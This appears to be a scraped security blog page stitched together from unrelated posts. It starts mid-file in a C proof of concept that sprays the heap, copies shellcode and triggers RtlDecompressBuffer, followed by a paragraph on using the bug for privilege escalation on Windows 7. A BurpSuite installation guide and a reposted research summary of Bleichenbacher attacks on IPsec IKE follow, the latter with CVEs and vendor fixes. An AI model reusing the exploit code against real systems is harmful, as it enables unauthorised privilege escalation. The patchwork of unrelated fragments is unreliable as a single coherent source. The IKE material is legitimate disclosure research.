  memcpy(landing_ptr, shellcode, strlen(shellcode));

}

int main(int argc, char **argv) {
  FARPROC RtlDecompressBuffer;
  NTSTATUS ntStat;
  HANDLE heap;
  PUCHAR compressed, uncompressed;
  ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;

  RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");

  heap = GetProcessHeap();

  compressed_sz = estimated_uncompressed_sz = 1*KB;

  compressed = HeapAlloc(heap, 0, compressed_sz);

  uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);


  spray(heap);
  copy_shellcode();
  //landing_sigtrap(1*KB);
  printf("Landing ...\n");

  ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);

  switch(ntStat) {
    case STATUS_SUCCESS:
      printf("decompression Ok!\n");
      break;

    case STATUS_INVALID_PARAMETER:
      printf("bad compression parameter\n");
      break;


    case STATUS_UNSUPPORTED_COMPRESSION:
      printf("unsuported compression\n");
      break;

    case STATUS_BAD_COMPRESSION_BUFFER:
      printf("Need more uncompressed buffer\n");
      break;

    default:
      printf("weird decompression state\n");
      break;
  }

  printf("end.\n");
}

The attack vector


This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7

jueves, 14 de mayo de 2020

BurpSuite Introduction & Installation

What is BurpSuite?
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed.

Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.htmland make a note of where you save it.

on for Firefox from https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.

Video for setup and installation.

You need to install compatible version of java , So that you can run BurpSuite.

More information

Practical Bleichenbacher Attacks On IPsec IKE

We found out that reusing a key pair across different versions and modes of IPsec IKE can lead to cross-protocol authentication bypasses, enabling the impersonation of a victim host or network by attackers. These vulnerabilities existed in implementations by Cisco, Huawei, and others.

This week at the USENIX Security conference, I will present our research paper on IPsec attacks: The Dangers of Key Reuse: Practical Attacks on IPsec IKE written by Martin Grothe, Jörg Schwenk, and me from Ruhr University Bochum as well as Adam Czubak and Marcin Szymanek from the University of Opole [alternative link to the paper]. This blog post is intended for people who like to get a comprehensive summary of our findings rather than to read a long research paper.

IPsec and Internet Key Exchange (IKE)

IPsec enables cryptographic protection of IP packets. It is commonly used to build VPNs (Virtual Private Networks). For key establishment, the IKE protocol is used. IKE exists in two versions, each with different modes, different phases, several authentication methods, and conﬁguration options. Therefore, IKE is one of the most complex cryptographic protocols in use.

In version 1 of IKE (IKEv1), four authentication methods are available for Phase 1, in which initial authenticated keying material is established: Two public key encryption based methods, one signature based method, and a PSK (Pre-Shared Key) based method.

Attacks on IKE implementations

With our attacks we can impersonate an IKE device: If the attack is successful, we share a set of (falsely) authenticated symmetric keys with the victim device, and can successfully complete the handshake – this holds for both IKEv1 and IKEv2. The attacks are based on Bleichenbacher oracles in the IKEv1 implementations of four large network equipment manufacturers: Cisco, Huawei, Clavister, and ZyXEL. These Bleichenbacher oracles can also be used to forge digital signatures, which breaks the signature based IKEv1 and IKEv2 variants. Those who are unfamiliar with Bleichenbacher attacks may read this post by our colleague Juraj Somorovsky for an explanation.

The affected hardware test devices by Huawei, Cisco, and ZyXEL in our network lab.

We show that the strength of these oracles is sufficient to break all handshake variants in IKEv1 and IKEv2 (except those based on PSKs) when given access to powerful network equipment. We furthermore demonstrate that key reuse across protocols as implemented in certain network equipment carries high security risks.

We additionally show that both PSK based modes can be broken with an offline dictionary attack if the PSK has low entropy. Such an attack was previously only documented for one of those modes (edit: see this comment). We thus show attacks against all authentication modes in both IKEv1 and IKEv2 under reasonable assumptions.

The relationship between IKEv1 Phase 1, Phase 2, and IPsec ESP. Multiple simultaneous Phase 2 connections can be established from a single Phase 1 connection. Grey parts are encrypted, either with IKE derived keys (light grey) or with IPsec keys (dark grey). The numbers at the curly brackets denote the number of messages to be exchanged in the protocol.

Where's the bug?

The public key encryption (PKE) based authentication mode of IKE requires that both parties exchanged their public keys securely beforehand (e. g. with certiﬁcates during an earlier handshake with signature based authentication). RFC 2409 advertises this mode of authentication with a plausibly deniable exchange to raise the privacy level. In this mode, messages three and four of the handshake exchange encrypted nonces and identities. They are encrypted using the public key of the respective other party. The encoding format for the ciphertexts is PKCS #1 v1.5.

Bleichenbacher attacks are adaptive chosen ciphertext attacks against RSA-PKCS #1 v1.5. Though the attack has been known for two decades, it is a common pitfall for developers. The mandatory use of PKCS #1 v1.5 in the PKE authentication methods raised suspicion of whether implementations resist Bleichenbacher attacks.

PKE authentication is available and fully functional in Cisco's IOS operating system. In Clavister's cOS and ZyXEL's ZyWALL USG devices, PKE is not ofﬁcially available. There is no documentation and no conﬁguration option for it and it is therefore not fully functional. Nevertheless, these implementations processed messages using PKE authentication in our tests.

Huawei implements a revised mode of the PKE mode mentioned in the RFC that saves one private key operation per peer (we call it RPKE mode). It is available in certain Huawei devices including the Secospace USG2000 series.

We were able to conﬁrm the existence of Bleichenbacher oracles in all these implementations. Here are the CVE entries and security advisories by the vendors (I will add links once they are available):

Cisco: CVE-2018-0131, Security Advisory
Huawei: CVE-2017-17305, Security Advisory
Clavister: CVE-2018-8753, Security Advisory
Zyxel: CVE-2018-9129, Security Advisory

On an abstract level, these oracles work as follows: If we replace the ciphertext of the nonce in the third handshake message with a modiﬁed RSA ciphertext, the responder will either indicate an error (Cisco, Clavister, and ZyXEL) or silently abort (Huawei) if the ciphertext is not PKCS #1 v1.5 compliant. Otherwise, the responder continues with the fourth message (Cisco and Huawei) or return an error notiﬁcation with a different message (Clavister and ZyXEL) if the ciphertext is in fact PKCS #1 v1.5 compliant. Each time we learn that the ciphertext was valid, we can advance the Bleichenbacher attack one more step.

A Bleichenbacher Attack Against PKE

If a Bleichenbacher oracle is discovered in a TLS implementation, then TLS-RSA is broken since one can compute the Premaster Secret and the TLS session keys without any time limit on the usage of the oracle. For IKEv1, the situation is more difﬁcult: Even if there is a strong Bleichenbacher oracle in PKE and RPKE mode, our attack must succeed within the lifetime of the IKEv1 Phase 1 session, since a Diffie-Hellman key exchange during the handshake provides an additional layer of security that is not present in TLS-RSA. For example, for Cisco this time limit is currently ﬁxed to 60 seconds for IKEv1 and 240 seconds for IKEv2.

To phrase it differently: In TLS-RSA, a Bleichenbacher oracle allows to perform an ex post attack to break the conﬁdentiality of the TLS session later on, whereas in IKEv1 a Bleichenbacher oracle only can be used to perform an online attack to impersonate one of the two parties in real time.

Bleichenbacher attack against IKEv1 PKE based authentication.

The figure above depicts a direct attack on IKEv1 PKE:

The attackers initiate an IKEv1 PKE based key exchange with Responder A and adhere to the protocol until receiving the fourth message. They extract the encrypted nonce from this message, and record the other public values of the handshake.
The attackers keep the IKE handshake with Responder A alive as long as the responder allows. For Cisco and ZyXEL we know that handshakes are cancelled after 60 seconds, Clavister and Huawei do so after 30 seconds.
The attackers initiate several parallel PKE based key exchanges to Responder B.

In each of these exchanges, they send and receive the ﬁrst two messages according to the protocol speciﬁcations.
In the third message, they include a modiﬁed version of the encrypted nonce according to the the Bleichenbacher attack methodology.
They wait until they receive an answer or they can reliably determine that this message will not be sent (timeout or reception of a repeated second handshake message).

After receiving enough answers from Responder B, the attackers can compute the plaintext of the nonce.
The attackers now have all the information to complete the key derivation and the handshake. They thus can impersonate Responder B to Responder A.

Key Reuse

Maintaining individual keys and key pairs for each protocol version, mode, and authentication method of IKE is difﬁcult to achieve in practice. It is oftentimes simply not supported by implementations. This is the case with the implementations by Clavister and ZyXEL, for example. Thus, it is common practice to have only one RSA key pair for the whole IKE protocol family. The actual security of the protocol family in this case crucially depends on its cross-ciphersuite and cross-version security. In fact, our Huawei test device reuses its RSA key pair even for SSH host identification, which further exposes this key pair.

A Cross-Protocol Version Attack with Digital Signature Based Authentication

Signature Forgery Using Bleichenbacher's Attack

It is well known that in the case of RSA, performing a decryption and creating a signature is mathematically the same operation. Bleichenbacher's original paper already mentioned that the attack could also be used to forge signatures over attacker-chosen data. In two papers that my colleagues at our chair have published, this has been exploited for attacks on XML-based Web Services, TLS 1.3, and Google's QUIC protocol. The ROBOT paper used this attack to forge a signature from Facebook's web servers as proof of exploitability.

IKEv2 With Digital Signatures

Digital signature based authentication is supported by both IKEv1 and IKEv2. We focus here on IKEv2 because on Cisco routers, an IKEv2 handshake may take up to four minutes. This more relaxed timer compared to IKEv1 makes it an interesting attack target.

I promised that this blogpost will only give a comprehensive summary, therefore I am skipping all the details about IKEv2 here. It is enough to know that the structure of IKEv2 is fundamentally different from IKEv1.

If you're familiar with IT-security, then you will believe me that if digital signatures are used for authentication, it is not particularly good if an attacker can get a signature over attacker chosen data. We managed to develop an attack that exploits an IKEv1 Bleichenbacher oracle at some peer A to get a signature that can be used to break the IKEv2 authentication at another peer B. This requires that peer A reuses its key pair for IKEv2 also for IKEv1. For the details, please read our paper [alternative link to the paper].

Evaluation and Results

For testing the attack, we used a Cisco ASR 1001-X router running IOS XE in version 03.16.02.S with IOS version 15.5(3)S2. Unfortunately, Cisco's implementation is not optimized for throughput. From our observations we assume that all cryptographic calculations for IKE are done by the device's CPU despite it having a hardware accelerator for cryptography. One can easily overload the device's CPU for several seconds with a standard PC bursting handshake messages, even with the default limit for concurrent handshakes. And even if the CPU load is kept below 100 %, we nevertheless observed packet loss.

For the decryption attack on Cisco's IKEv1 responder, we need to ﬁnish the Bleichenbacher attack in 60 seconds. If the public key of our ASR 1001-X router is 1024 bits long, we measured an average of 850 responses to Bleichenbacher requests per second. Therefore, an attack must succeed with at most 51,000 Bleichenbacher requests.

But another limit is the management of Security Associations (SAs). There is a global limit of 900 Phase 1 SAs under negotiation per Cisco device in the default conﬁguration. If this number is exceeded, one is blocked. Thus, one cannot start individual handshakes for each Bleichenbacher request to issue. Instead, SAs have to be reused as long as their error counter allows. Furthermore, establishing SAs with Cisco IOS is really slow. During the attack, the negotiations in the first two messages of IKEv1 require more time than the actual Bleichenbacher attack.

We managed to perform a successful decryption attack against our ASR 1001-X router with approximately 19,000 Bleichenbacher requests. However, due to the necessary SA negotiations, the attack took 13 minutes.

For the statistics and for the attack evaluation of digital signature forgery, we used a simulator with an oracle that behaves exactly as the ones by Cisco, Clavister, and ZyXEL. We found that about 26% of attacks against IKEv1 could be successful based on the cryptographic performance of our Cisco device. For digital signature forgery, about 22% of attacks could be successful under the same assumptions.

Note that (without a patched IOS), only non-cryptographic performance issues prevented a succesful attack on our Cisco device. There might be faster devices that do not suffer from this. Also note that a too slow Bleichenbacher attack does not permanently lock out attackers. If a timeout occurs, they can just start over with a new attack using fresh values hoping to require fewer requests. If the victim has deployed multiple responders sharing one key pair (e. g. for load balancing), this could also be leveraged to speed up an attack.

Responsible Disclosure

We reported our ﬁndings to Cisco, Huawei, Clavister, and ZyXEL. Cisco published ﬁxes with IOS XE versions 16.3.6, 16.6.3, and 16.7.1. They further informed us that the PKE mode will be removed with the next major release.

Huawei published ﬁrmware version V300R001C10SPH702 for the Secospace USG2000 series that removes the Bleichenbacher oracle and the crash bugs we identiﬁed. Customers who use other affected Huawei devices will be contacted directly by their support team as part of a need-to-know strategy.

Clavister removed the vulnerable authentication method with cOS version 12.00.09. ZyXEL responded that our ZyWALL USG 100 test device is from a legacy model series that is end-of-support. Therefore, these devices will not receive a ﬁx. For the successor models, the patched ﬁrmware version ZLD 4.32 (Release Notes) is available.

FAQs

Why don't you have a cool name for this attack?
The attack itself already has a name, it's Bleichenbacher's attack. We just show how Bleichenbacher attacks can be applied to IKE and how they can break the protocol's security. So, if you like, call it IPsec-Bleichenbacher or IKE-Bleichenbacher.
Do you have a logo for the attack?
No.
My machine was running a vulnerable firmware. Have I been attacked?
We have no indication that the attack was ever used in the wild. However, if you are still concerned, check your logs. The attack is not silent. If your machine was used for a Bleichenbacher attack, there should be many log entries about decryption errors. If your machine was the one that got tricked (Responder A in our figures), then you could probably find log entries about unfinished handshake attempts.
Where can I learn more?
First of all, you can read the paper [alternative link to the paper]. Second, you can watch the presentation, either live at the conference or later on this page.
What else does the paper contain?
The paper contains a lot more details than this blogpost. It explains all authentication methods including IKEv2 and it gives message flow diagrams of the protocols. There, we describe a variant of the attack that uses the Bleichenbacher oracles to forge signatures to target IKEv2. Furthermore, we describe the quirks of Huawei's implementation including crash bugs that could allow for Denial-of-Service attacks. Last but not least, it describes a dictionary attack against the PSK mode of authentication that is covered in a separate blogpost.